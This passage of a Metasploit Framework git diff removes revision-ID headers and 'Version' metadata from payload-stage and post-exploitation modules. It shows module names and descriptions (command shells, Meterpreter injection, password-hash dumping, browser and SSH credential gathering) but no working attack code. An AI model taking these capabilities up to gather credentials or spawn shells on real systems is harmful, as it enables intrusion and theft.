+1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 9185c1f350..50a977a4e5 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a command shell (staged)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index 9896416869..ced651945e 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -16,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X dup2 Command Shell', - 'Version' => '$Revision$', 'Description' => 'dup2 socket in edi, then execve', 'Author' => 'nemo', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index f7aa13a237..47e1c26a76 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ require 'msf/core/payload/osx/bundleinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Osx::BundleInject end diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 398a6d5fc5..ea3bc6a195 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Mac OS X x86 iSight Photo Capture', - 'Version' => '$Revision$', 'Description' => 'Inject a Mach-O bundle to capture a photo from the iSight (staged)', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index f32e428dbe..30ee0f44e8 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell', - 'Version' => '$Revision$', 'Description' => 'Call vfork() if necessary and spawn a command shell (staged)', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index fc618945a8..46e418764d 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Run a meterpreter server in PHP', 'Author' => ['egypt'], 'Platform' => 'php', diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 58726393ec..f8e1e14c66 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ require 'msf/core/payload/windows/reflectivedllinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::ReflectiveDllInject end diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 5d7d4a332c..2db5846006 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Meterpreter (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)', 'Author' => ['skape','sf'], 'PayloadCompat' => diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index e0dc88504e..1228e6431d 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ require 'msf/core/payload/windows/dllinject' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::DllInject end diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index a3b0de3f09..be0b63ac4b 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Meterpreter (skape/jt Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL (staged)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 03699d1a7f..f99576454a 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (staged)', 'Author' => [ 'spoonm', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 71070e24db..4a16572faf 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Upload/Execute', - 'Version' => '$Revision$', 'Description' => 'Uploads an executable and runs it (staged)', 'Author' => ['vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 98e0658c20..2d4bb4c844 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'VNC Server (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject a VNC Dll via a reflective loader (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index aed8aee6a3..83715fca48 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 Meterpreter', - 'Version' => '$Revision$', 'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 1a9157bba8..c6120a7355 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell', - 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell (Windows x64) (staged)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 699087fdaa..2ae3e5bb49 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 VNC Server (Reflective Injection)', - 'Version' => '$Revision$', 'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index bea8f49d13..6f08ded7c7 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on an AIX System}, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'aix' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index c99aea134f..c9cabb9ac7 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'cisco'], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index 8cbe54dedc..b1caef36a3 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +30,6 @@ class Metasploit3 < Msf::Post and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index 7d1a1c59e0..1c89a65727 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Post 'ohdae ', # minor additions, modifications & testing 'Stephen Haywood ', # enum_linux ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index 41936215d0..c805b2d672 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Post 'sinn3r', # Testing and modification of original enum_linux 'ohdae ', # Combined separate mods, modifications and testing ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index b7198a99fc..a6f181b302 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Post # based largely on get_bash_history function by Stephen Haywood 'ohdae ' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index 7199afe465..fb25a0a688 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on a Linux System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 65f2ee3b3f..2346a4293c 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post 'hdm', 'bannedit' # Based on bannedit's pidgin_cred module structure ], - 'Version' => '$Revision$', 'Platform' => ['win', 'osx'], 'SessionTypes' => ['meterpreter', 'shell'] )) diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3b55f64e32..c20dc9f0f9 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index b652bc0a32..9efffbf109 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index af7564c081..693ee1a91f 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index c2ec5a96eb..4bb07f689a 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 21082df61a..c8141827ef 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module prints out the operating system environment variables }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'egypt' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 2ce2989a1f..252525e38b 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post 'bannedit', # post port, added support for shell sessions 'Carlos Perez ' # original meterpreter script ], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index cbde7b8b5d..82eaf62ec9 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index 36b3d2192f..62944537bb 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win', 'linux', 'bsd', 'unix', 'osx'], 'SessionTypes' => ['meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 108bf474dd..87c038e36b 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index 97d856dd19..6a171d4c28 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post execute the commands in the specified Meterpreter or shell session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'linux', 'bsd', 'unix', 'osx' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 20eb2c0d92..d7b0b6d06c 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Post 'bannedit', # post port, added support for shell sessions 'Carlos Perez ' # original meterpreter script ], - 'Version' => '$Revision$', 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'], 'SessionTypes' => ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index f9eb6e6904..eac46c3698 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Performs IPv4 ping sweep using the OS included ping command.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 0b8f88355a..ee5a21c389 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post execute the commands in the specified Meterpreter session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index cf801b37fb..eaad0884e7 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'osx' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index e08cba4dd0..60638eece6 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Jim Halfpenny'], - 'Version' => "$Revision$", 'Platform' => ['linux', 'bsd', 'unix', 'osx'], 'SessionTypes' => ['meterpreter', 'shell' ] )) diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 79bab5b8fa..6a1b846e69 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module closes the specified session. This can be useful as a finisher for automation tasks }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win', 'unix', 'osx' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 5bd341fe80..6bf116701f 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module executes an arbitrary command line}, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win', 'unix', 'osx' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index e5e2a89df4..a5324c8f53 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ ''], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'unix', 'osx', 'linux', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index f80cbb92d3..e2e1273030 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'todb '], - 'Version' => '$Revision$', 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 0d602e684e..1724d1fa7f 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'unix', 'osx', 'linux'], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index 61effe8e0f..9e7e897d29 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'osx' ], 'SessionTypes' => [ "shell" ] )) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index ff97c6ee46..bef4feac4c 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ','hammackj '], - 'Version' => '$Revision$', 'Platform' => [ 'osx' ], 'SessionTypes' => [ "shell" ] )) diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index b4c03e1eaa..68f63f4741 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +28,6 @@ class Metasploit3 < Msf::Post and 